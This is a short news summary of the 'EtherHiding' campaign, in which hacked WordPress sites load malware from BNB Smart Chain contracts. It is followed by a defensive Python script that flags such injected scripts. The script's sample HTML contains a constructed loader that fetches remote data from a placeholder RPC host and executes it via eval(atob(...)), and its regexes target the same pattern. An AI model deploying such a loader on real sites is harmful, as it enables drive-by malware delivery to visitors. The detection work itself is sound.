– Cybercriminals have found a new method to spread malware by manipulating BNB Smart Chain (BSC) smart contracts.
– The attack, known as “EtherHiding”, involves compromising WordPress websites and injecting code that retrieves partial payloads from the blockchain contracts.
– Attackers hide the payloads in BSC smart contracts, using them as anonymous free hosting platforms.
– The hackers can update the code and change the attack methods at will.
– Recent attacks have come in the form of fake browser updates, where victims are prompted to update their browsers using a fake landing page and link.
– The payload contains JavaScript that fetches additional code from the attacker’s domains, leading to full site defacement with fake browser update notices that distribute malware.
– This approach allows threat actors to modify the attack chain by swapping out malicious code with each new blockchain transaction, making it challenging to mitigate.
– Once the infected smart contracts are deployed, Binance can only rely on its developer community to flag malicious code.
– Website owners using WordPress need to be extra vigilant with their security practices.
– Web3 and blockchain bring new possibilities for malicious campaigns to operate unchecked, requiring adaptive defenses to counter these emerging threats.
Hackers create novel way to hide malicious code in blockchains
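
A defender-side check for the injection pattern summarized above, added here as an example and not taken from the article: it audits a rendered WordPress page for scripts that read from a blockchain RPC endpoint and flags those that also execute fetched data. The regex heuristics, the names `ScriptCollector` and `audit_page`, and the sample HTML are assumptions constructed for illustration.

```python
import re
from html.parser import HTMLParser

# Heuristics below are assumptions for this example, not IoCs from the article.
CHAIN_ACCESS = re.compile(r"bsc-dataseed[\w.-]*|\beth_call\b|\.eth\.Contract\s*\(", re.I)
DYNAMIC_EXEC = re.compile(r"\beval\s*\(|new\s+Function\s*\(|\batob\s*\(", re.I)

class ScriptCollector(HTMLParser):
    """Collect every <script> element as a (src, inline_body) pair."""
    def __init__(self):
        super().__init__()
        self.scripts, self._open = [], None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._open = [dict(attrs).get("src") or "", ""]

    def handle_data(self, data):
        if self._open is not None:
            self._open[1] += data

    def handle_endtag(self, tag):
        if tag == "script" and self._open is not None:
            self.scripts.append(tuple(self._open))
            self._open = None

def audit_page(html):
    """Return (verdict, evidence) for each script that reaches a chain RPC."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        chain = CHAIN_ACCESS.search(src + "\n" + body)
        if chain:
            # Chain read plus dynamic execution is the pattern worth escalating.
            verdict = "suspicious" if DYNAMIC_EXEC.search(body) else "review"
            findings.append((verdict, chain.group(0)))
    return findings

# Constructed sample: one ordinary script and one injected-style loader.
SAMPLE = """<html><head>
<script src="/wp-includes/js/jquery/jquery.min.js"></script>
<script>fetch("https://bsc-dataseed1.example.invalid/", {method: "POST",
  body: '{"method":"eth_call"}'}).then(r => r.text()).then(t => eval(atob(t)));
</script></head><body>Blog</body></html>"""

if __name__ == "__main__":
    for verdict, evidence in audit_page(SAMPLE):
        print(verdict, evidence)
```

A "review" verdict covers pages that legitimately talk to a chain (for example a wallet widget); on a site with no Web3 features, any hit is worth tracing back to the theme or plugin file that emitted it.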
